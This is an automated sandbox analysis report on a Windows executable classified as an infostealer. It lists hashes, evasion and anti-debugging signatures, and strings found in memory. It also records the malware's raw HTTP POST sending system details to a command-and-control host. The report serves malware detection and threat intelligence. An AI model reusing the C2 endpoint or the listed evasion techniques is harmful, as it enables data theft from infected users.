Edit tour

Windows Analysis Report
OoYYtngD7d.exe

Overview

General Information

Sample name:	OoYYtngD7d.exe renamed because original name is a hash value
Original sample name:	ed79b16c404fd4bdc0f3de692cc154ad.exe
Analysis ID:	1581255
MD5:	ed79b16c404fd4bdc0f3de692cc154ad
SHA1:	10404abae6c82c38676da0478af22103aaaefd56
SHA256:	81d19c557d31608a6be0d419928e30dca063c2a2bb909d03133c15d75f246e56
Tags:	exeuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Hides threads from debuggers

Infostealer behavior detected

Leaks process information

Machine Learning detection for sample

PE file contains section with special chars

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create an SMB header

Detected potential crypto function

Entry point lies outside standard sections

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

OoYYtngD7d.exe (PID: 3604 cmdline: "C:\Users\user\Desktop\OoYYtngD7d.exe" MD5: ED79B16C404FD4BDC0F3DE692CC154AD)

cleanup

HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 443559Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 31 35 37 33 34 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 2

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 08:10:21 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 08:10:23 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Source: OoYYtngD7d.exe, 00000000.00000003.2147343659.0000000007440000.00000004.00001000.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.css
Source: OoYYtngD7d.exe, 00000000.00000003.2147343659.0000000007440000.00000004.00001000.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.jpg
Source: OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: OoYYtngD7d.exe, 00000000.00000003.2312622916.0000000001642000.00000004.00000020.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2328985503.0000000001649000.00000004.00000020.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000003.2312725633.0000000001647000.00000004.00000020.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: OoYYtngD7d.exe, 00000000.00000003.2312622916.0000000001642000.00000004.00000020.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2328985503.0000000001649000.00000004.00000020.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000003.2312725633.0000000001647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963
Source: OoYYtngD7d.exe, 00000000.00000003.2311335955.0000000001651000.00000004.00000020.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2329063398.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: OoYYtngD7d.exe, 00000000.00000003.2312622916.0000000001642000.00000004.00000020.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2328985503.0000000001649000.00000004.00000020.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000003.2312725633.0000000001647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lseD
Source: OoYYtngD7d.exe, 00000000.00000003.2147343659.0000000007440000.00000004.00001000.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: OoYYtngD7d.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: OoYYtngD7d.exe, OoYYtngD7d.exe, 00000000.00000003.2147343659.0000000007440000.00000004.00001000.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: OoYYtngD7d.exe, 00000000.00000003.2147343659.0000000007440000.00000004.00001000.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000003.2183946823.000000000165D000.00000004.00000020.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://httpbin.org/ip
Source: OoYYtngD7d.exe, 00000000.00000003.2147343659.0000000007440000.00000004.00001000.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://httpbin.org/ipbefore
Source: OoYYtngD7d.exe, 00000000.00000003.2183946823.000000000165D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/iphDf

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

System Summary

PE file contains section with special chars

Source: OoYYtngD7d.exe	Static PE information: section name:
Source: OoYYtngD7d.exe	Static PE information: section name: .idata
Source: OoYYtngD7d.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016AF1A9	0_3_016AF1A9
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016AF1A9	0_3_016AF1A9
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016AF1A9	0_3_016AF1A9
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016AF1A9	0_3_016AF1A9
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016AF1A9	0_3_016AF1A9
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016AF1A9	0_3_016AF1A9
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016AF1A9	0_3_016AF1A9
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016AF1A9	0_3_016AF1A9
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C544E	0_3_016C544E
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016AF1A9	0_3_016AF1A9
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016AF1A9	0_3_016AF1A9
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C669F	0_3_016C669F
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_004805B0	0_2_004805B0
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_00486FA0	0_2_00486FA0
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_004AF100	0_2_004AF100
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_0053B180	0_2_0053B180
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_007FE050	0_2_007FE050
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_007FA000	0_2_007FA000
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_005400E0	0_2_005400E0
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_004D6210	0_2_004D6210
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_0053C320	0_2_0053C320
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_007C4410	0_2_007C4410
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_00540420	0_2_00540420
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_0047E620	0_2_0047E620
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_0053C770	0_2_0053C770
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_007D6730	0_2_007D6730
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_004DA7F0	0_2_004DA7F0
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_007F4780	0_2_007F4780
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_00484940	0_2_00484940
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_0047A960	0_2_0047A960
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_0052C900	0_2_0052C900
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_00646AC0	0_2_00646AC0
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_0072AAC0	0_2_0072AAC0
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_00604B60	0_2_00604B60
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_0072AB2C	0_2_0072AB2C
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_007E8BF0	0_2_007E8BF0
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_0047CBB0	0_2_0047CBB0
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_007FCC90	0_2_007FCC90
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_007F4D40	0_2_007F4D40
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_00630D80	0_2_00630D80
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_007ECD80	0_2_007ECD80
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_0078AE30	0_2_0078AE30
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_00494F70	0_2_00494F70
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_0053EF90	0_2_0053EF90
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_00538F90	0_2_00538F90
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_007C2F90	0_2_007C2F90
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_004810E6	0_2_004810E6
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C5953	0_3_016C5953
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C5953	0_3_016C5953
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C5953	0_3_016C5953
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_3_016C5953	0_3_016C5953

Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: String function: 0048CCD0 appears 38 times
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: String function: 0064CBC0 appears 57 times
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: String function: 004775A0 appears 434 times
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: String function: 0048CD40 appears 47 times
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: String function: 00627220 appears 76 times
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: String function: 004B50A0 appears 67 times
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: String function: 0047CAA0 appears 51 times
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: String function: 004B4F40 appears 215 times
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: String function: 004773F0 appears 81 times
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: String function: 004B4FD0 appears 146 times
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: String function: 005544A0 appears 41 times

Source: OoYYtngD7d.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: OoYYtngD7d.exe

Static PE information: Section: tflagfcm ZLIB complexity 0.9944038553810065

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2

Source: C:\Users\user\Desktop\OoYYtngD7d.exe

Code function: 0_2_0047255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,

0_2_0047255D

Source: C:\Users\user\Desktop\OoYYtngD7d.exe

Code function: 0_2_004729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,

0_2_004729FF

Source: C:\Users\user\Desktop\OoYYtngD7d.exe

Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\OoYYtngD7d.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\OoYYtngD7d.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: OoYYtngD7d.exe	Virustotal: Detection: 33%
Source: OoYYtngD7d.exe	ReversingLabs: Detection: 50%

Source: OoYYtngD7d.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: OoYYtngD7d.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: OoYYtngD7d.exe

Static file information: File size 4472832 > 1048576

Source: OoYYtngD7d.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: OoYYtngD7d.exe	Static PE information: Raw size of tflagfcm is bigger than: 0x100000 < 0x1b7a00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\OoYYtngD7d.exe

